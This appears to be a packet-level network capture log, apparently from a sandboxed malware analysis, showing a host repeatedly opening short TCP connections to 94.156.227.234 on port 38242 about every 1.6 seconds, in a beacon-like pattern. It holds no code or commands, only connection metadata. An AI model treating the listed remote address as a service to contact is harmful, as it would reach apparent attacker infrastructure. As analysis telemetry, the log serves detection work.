                                                                        Dec 24, 2024 05:33:21.114172935 CET382426003694.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:33:21.497998953 CET6003638242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:21.659179926 CET382426003694.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:33:22.125289917 CET382426003694.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:33:22.125389099 CET6003638242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:22.498790979 CET6003838242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:22.618421078 CET382426003894.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:33:22.618623018 CET6003838242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:22.618623018 CET6003838242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:22.738185883 CET382426003894.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:33:23.121874094 CET6003838242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:23.283230066 CET382426003894.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:33:23.742161989 CET382426003894.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:33:23.742275953 CET6003838242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:24.122687101 CET6004038242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:24.242429018 CET382426004094.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:33:24.242558002 CET6004038242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:24.242577076 CET6004038242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:24.362206936 CET382426004094.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:33:24.745645046 CET6004038242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:24.907272100 CET382426004094.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:33:25.370733023 CET382426004094.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:33:25.370913982 CET6004038242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:25.746486902 CET6004238242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:25.866189003 CET382426004294.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:33:25.866255999 CET6004238242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:25.866270065 CET6004238242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:25.985946894 CET382426004294.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:33:26.370001078 CET6004238242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:26.531308889 CET382426004294.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:33:26.990225077 CET382426004294.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:33:26.990299940 CET6004238242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:27.370891094 CET6004438242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:27.490756989 CET382426004494.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:33:27.490902901 CET6004438242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:27.490932941 CET6004438242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:27.610682011 CET382426004494.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:33:27.994432926 CET6004438242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:28.159235954 CET382426004494.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:33:28.614214897 CET382426004494.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:33:28.614278078 CET6004438242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:28.769428015 CET42836443192.168.2.2391.189.91.43
                                                                        Dec 24, 2024 05:33:28.995368004 CET6004638242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:29.115170956 CET382426004694.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:33:29.115228891 CET6004638242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:29.115255117 CET6004638242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:29.234801054 CET382426004694.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:33:29.619668961 CET6004638242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:29.783224106 CET382426004694.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:33:30.234174013 CET382426004694.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:33:30.234241962 CET6004638242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:30.620604992 CET6004838242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:30.740278006 CET382426004894.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:33:30.740408897 CET6004838242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:30.740458012 CET6004838242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:30.859989882 CET382426004894.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:33:31.244438887 CET6004838242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:31.411222935 CET382426004894.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:33:31.877742052 CET382426004894.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:33:31.877837896 CET6004838242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:32.245455980 CET6005038242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:32.366487026 CET382426005094.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:33:32.366549969 CET6005038242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:32.366606951 CET6005038242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:32.486118078 CET382426005094.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:33:32.864820004 CET4251680192.168.2.23109.202.202.202
                                                                        Dec 24, 2024 05:33:32.872127056 CET6005038242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:33.039223909 CET382426005094.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:33:33.489451885 CET382426005094.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:33:33.489525080 CET6005038242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:33.873389959 CET6005238242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:33.993088961 CET382426005294.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:33:33.993191004 CET6005238242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:33.993208885 CET6005238242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:34.112983942 CET382426005294.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:33:34.497623920 CET6005238242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:34.659296036 CET382426005294.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:33:35.134367943 CET382426005294.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:33:35.134459972 CET6005238242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:35.499150038 CET6005438242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:35.618972063 CET382426005494.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:33:35.619040966 CET6005438242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:35.619057894 CET6005438242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:35.738692045 CET382426005494.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:33:36.122898102 CET6005438242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:36.287203074 CET382426005494.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:33:36.739195108 CET382426005494.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:33:36.739280939 CET6005438242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:37.123941898 CET6005638242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:37.243798971 CET382426005694.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:33:37.243884087 CET6005638242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:37.243946075 CET6005638242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:37.363579988 CET382426005694.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:33:37.748136997 CET6005638242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:37.915234089 CET382426005694.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:33:38.374928951 CET382426005694.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:33:38.375015020 CET6005638242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:38.748976946 CET6005838242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:38.868633986 CET382426005894.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:33:38.868710041 CET6005838242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:38.868777990 CET6005838242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:38.988287926 CET382426005894.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:33:39.371814966 CET6005838242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:39.535254002 CET382426005894.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:33:39.990307093 CET382426005894.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:33:39.990392923 CET6005838242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:40.372570992 CET6006038242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:40.492213011 CET382426006094.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:33:40.492291927 CET6006038242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:40.492319107 CET6006038242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:40.612027884 CET382426006094.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:33:40.995357990 CET6006038242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:41.155188084 CET382426006094.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:33:41.624336958 CET382426006094.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:33:41.624406099 CET6006038242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:41.996442080 CET6006238242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:42.116257906 CET382426006294.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:33:42.116328001 CET6006238242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:42.116358042 CET6006238242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:42.236126900 CET382426006294.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:33:42.620140076 CET6006238242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:42.787372112 CET382426006294.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:33:43.230470896 CET382426006294.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:33:43.230540991 CET6006238242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:43.621268988 CET6006438242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:43.741139889 CET382426006494.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:33:43.741290092 CET6006438242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:43.741290092 CET6006438242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:43.860941887 CET382426006494.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:33:44.245049953 CET6006438242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:44.411329985 CET382426006494.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:33:44.863847971 CET382426006494.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:33:44.863991976 CET6006438242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:45.245971918 CET6006638242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:45.365813017 CET382426006694.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:33:45.365948915 CET6006638242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:45.366017103 CET6006638242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:45.485553980 CET382426006694.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:33:45.870713949 CET6006638242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:46.031229019 CET382426006694.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:33:46.512732029 CET382426006694.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:33:46.512878895 CET6006638242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:46.872035980 CET6006838242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:46.991673946 CET382426006894.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:33:46.991791010 CET6006838242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:46.991791010 CET6006838242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:47.111526966 CET382426006894.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:33:47.496808052 CET6006838242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:47.659199953 CET382426006894.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:33:48.117721081 CET382426006894.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:33:48.117861986 CET6006838242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:48.498167992 CET6007038242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:48.617961884 CET382426007094.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:33:48.618249893 CET6007038242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:48.618249893 CET6007038242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:48.737931013 CET382426007094.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:33:49.122229099 CET6007038242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:49.283135891 CET382426007094.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:33:49.752836943 CET382426007094.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:33:49.753180981 CET6007038242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:50.123857021 CET6007238242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:50.243621111 CET382426007294.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:33:50.243793011 CET6007238242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:50.243860960 CET6007238242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:50.364203930 CET382426007294.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:33:50.749988079 CET6007238242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:50.911175013 CET382426007294.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:33:51.368128061 CET382426007294.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:33:51.368357897 CET6007238242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:51.751889944 CET6007438242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:51.871701956 CET382426007494.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:33:51.872083902 CET6007438242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:51.872085094 CET6007438242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:51.991879940 CET382426007494.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:33:52.378649950 CET6007438242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:52.543203115 CET382426007494.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:33:53.000586033 CET382426007494.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:33:53.001015902 CET6007438242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:53.380320072 CET6007638242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:53.501339912 CET382426007694.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:33:53.501660109 CET6007638242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:53.501739025 CET6007638242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:53.621336937 CET382426007694.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:33:54.008106947 CET6007638242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:54.171438932 CET382426007694.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:33:54.622528076 CET382426007694.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:33:54.622728109 CET6007638242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:55.010018110 CET6007838242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:55.129606962 CET382426007894.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:33:55.129838943 CET6007838242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:55.129838943 CET6007838242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:55.249521017 CET382426007894.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:33:55.635281086 CET6007838242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:55.799109936 CET382426007894.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:33:56.257339001 CET382426007894.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:33:56.257458925 CET6007838242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:56.636763096 CET6008038242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:56.756465912 CET382426008094.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:33:56.756565094 CET6008038242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:56.756664991 CET6008038242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:56.876410007 CET382426008094.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:33:57.262797117 CET6008038242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:57.423466921 CET382426008094.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:33:57.437418938 CET43928443192.168.2.2391.189.91.42
                                                                        Dec 24, 2024 05:33:58.264214039 CET6008238242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:58.364731073 CET382426008094.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:33:58.364809990 CET6008038242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:58.383858919 CET382426008294.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:33:58.383919954 CET6008238242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:58.383956909 CET6008238242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:58.507342100 CET382426008294.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:33:58.888549089 CET6008238242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:59.051170111 CET382426008294.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:33:59.523761988 CET382426008294.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:33:59.524060011 CET6008238242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:33:59.890386105 CET6008438242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:00.010121107 CET382426008494.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:34:00.010272980 CET6008438242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:00.010348082 CET6008438242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:00.129930973 CET382426008494.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:34:00.516685963 CET6008438242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:00.679116964 CET382426008494.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:34:01.136353970 CET382426008494.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:34:01.136622906 CET6008438242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:01.518573999 CET6008638242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:01.638514996 CET382426008694.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:34:01.638897896 CET6008638242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:01.638897896 CET6008638242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:01.758713961 CET382426008694.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:34:02.145493984 CET6008638242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:02.311188936 CET382426008694.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:34:02.769393921 CET382426008694.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:34:02.769562006 CET6008638242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:03.148297071 CET6008838242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:03.268171072 CET382426008894.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:34:03.268702984 CET6008838242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:03.268702984 CET6008838242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:03.388897896 CET382426008894.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:34:03.778285027 CET6008838242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:03.939553022 CET382426008894.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:34:04.402811050 CET382426008894.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:34:04.403067112 CET6008838242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:04.780540943 CET6009038242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:04.900424004 CET382426009094.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:34:04.900553942 CET6009038242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:04.900639057 CET6009038242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:05.020625114 CET382426009094.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:34:05.409142017 CET6009038242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:05.575380087 CET382426009094.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:34:06.023150921 CET382426009094.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:34:06.023380995 CET6009038242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:06.410789013 CET6009238242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:06.530706882 CET382426009294.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:34:06.531176090 CET6009238242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:06.531176090 CET6009238242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:06.651388884 CET382426009294.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:34:07.044600964 CET6009238242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:07.211366892 CET382426009294.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:34:07.652120113 CET382426009294.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:34:07.652276039 CET6009238242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:08.046317101 CET6009438242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:08.166033030 CET382426009494.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:34:08.166152954 CET6009438242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:08.166244030 CET6009438242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:08.286056995 CET382426009494.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:34:08.671124935 CET6009438242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:08.831171989 CET382426009494.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:34:09.296384096 CET382426009494.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:34:09.296698093 CET6009438242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:09.672655106 CET6009638242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:09.792387009 CET382426009694.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:34:09.792501926 CET6009638242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:09.792601109 CET6009638242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:09.912108898 CET382426009694.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:34:10.298854113 CET6009638242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:10.459084034 CET382426009694.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:34:10.927388906 CET382426009694.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:34:10.927614927 CET6009638242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:11.300704002 CET6009838242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:11.420327902 CET382426009894.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:34:11.420447111 CET6009838242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:11.420541048 CET6009838242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:11.540132999 CET382426009894.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:34:11.926866055 CET6009838242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:12.091160059 CET382426009894.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:34:12.539416075 CET382426009894.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:34:12.539598942 CET6009838242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:12.928611994 CET6010038242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:13.048413038 CET382426010094.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:34:13.048532009 CET6010038242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:13.048588037 CET6010038242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:13.168178082 CET382426010094.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:34:13.554133892 CET6010038242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:13.715192080 CET382426010094.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:34:14.180674076 CET382426010094.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:34:14.180807114 CET6010038242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:14.555823088 CET6010238242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:14.675479889 CET382426010294.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:34:14.675615072 CET6010238242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:14.675730944 CET6010238242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:14.795254946 CET382426010294.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:34:15.181143999 CET6010238242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:15.343116999 CET382426010294.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:34:15.804672956 CET382426010294.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:34:15.804980040 CET6010238242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:16.182837009 CET6010438242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:16.302517891 CET382426010494.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:34:16.302772999 CET6010438242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:16.302822113 CET6010438242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:16.422432899 CET382426010494.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:34:16.808521986 CET6010438242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:16.971079111 CET382426010494.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:34:17.428256035 CET382426010494.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:34:17.428354979 CET6010438242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:17.810656071 CET6010638242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:17.930946112 CET382426010694.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:34:17.931077957 CET6010638242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:17.931132078 CET6010638242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:18.050659895 CET382426010694.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:34:18.437294960 CET6010638242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:18.599189043 CET382426010694.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:34:19.057367086 CET382426010694.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:34:19.057635069 CET6010638242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:19.439752102 CET6010838242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:19.559426069 CET382426010894.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:34:19.559534073 CET6010838242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:19.559587002 CET6010838242192.168.2.2394.156.227.234
                                                                        Dec 24, 2024 05:34:19.679122925 CET382426010894.156.227.234192.168.2.23
                                                                        Dec 24, 2024 05:34:20.064968109 CET6010838242192.168.2.2394.156.227.234
